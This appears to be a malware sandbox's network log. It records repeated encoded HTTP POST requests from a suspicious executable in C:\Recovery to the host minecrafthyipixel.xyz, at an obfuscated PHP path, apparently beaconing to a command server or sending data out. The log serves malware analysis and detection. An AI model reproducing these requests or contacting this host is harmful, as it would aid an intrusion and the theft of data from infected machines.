                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:43:33.404798985 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:33.404993057 CEST2512OUTData Raw: 52 5f 5e 5a 59 45 51 58 5c 5e 59 59 57 50 58 5e 54 53 5f 5c 54 5b 53 5e 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R_^ZYEQX\^YYWPX^TS_\T[S^^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%!8?0^'2=3]2)/&&P !));\#\/%$[. X
                                                                                                                                    Apr 19, 2024 13:43:33.685295105 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:33 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I8rNfTEAQs2RDv1an%2FlEFaYvwb0rgiBFGopUu%2FBOrtilUc8RDDQBuP3TgoOrVyNmMXJdIswzivaiHyBHGphiNmuOkMOWfjle%2BL5oMUq8xr7g2oBp2WIrc2%2FySNEYmZJwP64O1gVV3QY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3397b03b06a-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:33.685344934 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    95192.168.2.449845104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:33.907149076 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:34.011806965 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:34.012062073 CEST2512OUTData Raw: 57 5a 5b 5c 59 42 51 5a 5c 5e 59 59 57 53 58 53 54 5a 5f 56 54 59 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ[\YBQZ\^YYWSXSTZ_VTYSX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%X>!+#3+[';"*;419R%(-#6U)#]4Z#9$[. X 5
                                                                                                                                    Apr 19, 2024 13:43:34.382775068 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:34 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YY0uoXvpr7Cv9XPXfbJWcrFRWoXvw5ep6wD%2BdwmBkS%2FhFtFm60BNXv%2FVrqRdkIIOL9R7nfNOdnC2PgHxAxNnDOVF5I%2BiP1vpPTNFAXB1JLUvCcd4NVSrS9YeGQAGSZRf0Cne1QMskyI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca33d4a0e6756-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:34.382797003 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    96192.168.2.449846104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:34.608321905 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:34.712671041 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:34.712961912 CEST2504OUTData Raw: 52 58 5e 54 5c 40 54 5c 5c 5e 59 59 57 57 58 5a 54 55 5f 58 54 58 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RX^T\@T\\^YYWWXZTU_XTXSW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%%2"+';[0;)#1:<U%W#)*++\4\-%$[. X !
                                                                                                                                    Apr 19, 2024 13:43:34.989496946 CEST627INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:34 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IX2nYxTHmsDPpFe8AkqkVFXuziMb4A6EaSl%2FE2ifrwvsf591chQmvjlzDIq6czy9w2MEq6gzXpDNFGd%2BDITjzfRj2WDlQtIH9%2B%2FquWwLelmL1Ol19OYHET9aKd5uxC9f%2B%2FUgY%2FM5Quw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca341ab43672d-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:34.989520073 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    97192.168.2.449847104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:35.219624996 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:35.323859930 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:35.324008942 CEST2512OUTData Raw: 57 5e 5b 5c 59 4b 51 58 5c 5e 59 59 57 51 58 52 54 56 5f 5f 54 5f 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W^[\YKQX\^YYWQXRTV__T_SX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%Z%"U5+,Y3#;_0!P=;4&$+.42*8?\7Z:5$[. X =
                                                                                                                                    Apr 19, 2024 13:43:35.597403049 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:35 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7v3rZg5YUdrAjmK2cPn5OWSbk9du2HxwwxK%2BcLtat77wMKWNoAMY2lks07dkmP5RudmH0000qu0OqQKE3Oihsn5M5qPuNzysxZY2te0oskuv4CLUJ5bMMLrI9az6%2BXarHYhrzDt6%2FU4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3457da4b04a-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:35.597429991 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    98192.168.2.449848104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:35.863596916 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:35.967883110 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:35.968077898 CEST2512OUTData Raw: 57 58 5b 5b 59 45 54 59 5c 5e 59 59 57 53 58 5d 54 51 5f 5b 54 58 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WX[[YETY\^YYWSX]TQ_[TXSV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%&.2R"$0;\'P>^&:31;.S41=)+/#<8_-%$[. X 5
                                                                                                                                    Apr 19, 2024 13:43:36.330974102 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:36 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qAwLlyOL%2B1TRUxH7Qquixd9AyBxKBVHLZ8zn5PXk%2FdEAYRREnMSo6tJKNWUlUXQsF4Jwg0RXA7tgpVyNSE0vfaC8MLT1NPq6OclybkQPL%2BMb36EWYFIfbdjBkajUQvqlbpQ8jN2LGRY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3497ffa44f6-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:36.330997944 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    99192.168.2.449849104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:36.561692953 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:36.666327953 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:36.666505098 CEST2512OUTData Raw: 52 59 5e 5b 59 4a 54 54 5c 5e 59 59 57 5f 58 52 54 57 5f 5e 54 59 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RY^[YJTT\^YYW_XRTW_^TYSX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%Z&=5!(3 $'8.>;'\1:'%*P7>V)+?_7<,9$[. X
                                                                                                                                    Apr 19, 2024 13:43:36.929672956 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:36 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iyjXD63Gq1REfjYzmtjAZY72y8Wt0u8EaJc1UHnoa8fx%2BBO%2BXbcvQ1ASS3hILTQ1Xml%2BqQj8Bh2k8EYA76olTX713cXjyxRV62RdnkyO72RfnW3BOFJMvcuSZr8p%2Bb2n3T854XdG0IA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca34ddb756744-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:36.929702997 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    100192.168.2.449850104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:37.358191967 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:37.462452888 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:38.583352089 CEST2504OUTData Raw: 57 5c 5b 58 59 43 51 5d 5c 5e 59 59 57 57 58 5f 54 55 5f 58 54 5f 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\[XYCQ]\^YYWWX_TU_XT_S[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%]&1",Z' 4$>\1:,R&!42>;< :$[. X 5


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    101192.168.2.449851104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:38.699636936 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2180
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:38.803930998 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:38.804451942 CEST2180OUTData Raw: 57 59 5e 58 59 41 54 5c 5c 5e 59 59 57 57 58 5e 54 5a 5f 58 54 5e 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WY^XYAT\\^YYWWX^TZ_XT^S[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%'-6U ;\' +$].>&,$;&Q4*$7<^.$[. X 1
                                                                                                                                    Apr 19, 2024 13:43:39.066993952 CEST768INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:39 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3zAUluxiU01M7DJmpwwV7QjoJf8t22WqxYa1DhCui4ONRAfKt%2Bjp7Ybqq0ZynII0cVOrKmgInPXxelNV%2Bu9q7KW3MwI62G2WX7MLcBuwYPuDdppFUrwh9%2F4mEPafHWY2PdQ5dXJuz34%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca35b3f23b0ca-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 27 07 24 26 3d 04 22 39 3c 00 29 30 3d 02 3d 37 07 5d 29 29 31 5d 37 3d 38 55 2f 3a 20 1f 2b 2b 29 05 25 23 29 56 24 13 24 52 25 0a 21 59 00 1a 39 59 23 12 26 04 2d 29 03 59 2b 22 3d 5e 34 21 27 5f 3c 3d 3a 0d 23 38 2f 5b 2b 10 25 15 3b 3b 2c 52 3c 06 39 15 2d 24 35 04 21 01 2c 52 09 12 26 0a 28 06 38 10 25 56 3d 57 34 0f 28 5d 28 3f 31 05 27 28 20 1d 26 20 23 07 2e 22 29 0d 27 3e 07 10 3d 2a 0e 10 20 3c 21 57 26 04 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98'$&="9<)0==7]))1]7=8U/: ++)%#)V$$R%!Y9Y#&-)Y+"=^4!'_<=:#8/[+%;;,R<9-$5!,R&(8%V=W4(](?1'( & #.")'>=* <!W&.^,+H0TW
                                                                                                                                    Apr 19, 2024 13:43:39.067050934 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    102192.168.2.449852104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:38.931951046 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:43:39.038124084 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:39.038435936 CEST2512OUTData Raw: 57 54 5b 5f 59 41 51 5e 5c 5e 59 59 57 56 58 59 54 52 5f 59 54 5d 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WT[_YAQ^\^YYWVXYTR_YT]SY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&1X>T"<0V808)>(?_&<%4"5>;/^4?;-5$[. X !
                                                                                                                                    Apr 19, 2024 13:43:39.313425064 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:39 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Kp3zeKl6KOcSQrapkbMk8PBKNevZRrlgw2aqfpnJYmJll%2BVIG1sDHAI1%2BIGUOLHxgt1UfgGVBaj2ysb%2Fa0aR7CLFLFvW197NSWZtg9oRfdaUOyBERewPLmPuBV6eh9ALPrJ8hyS7QE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca35caa376735-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:39.313484907 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    103192.168.2.449853104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:39.545855999 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:43:39.650800943 CEST25INHTTP/1.1 100 Continue
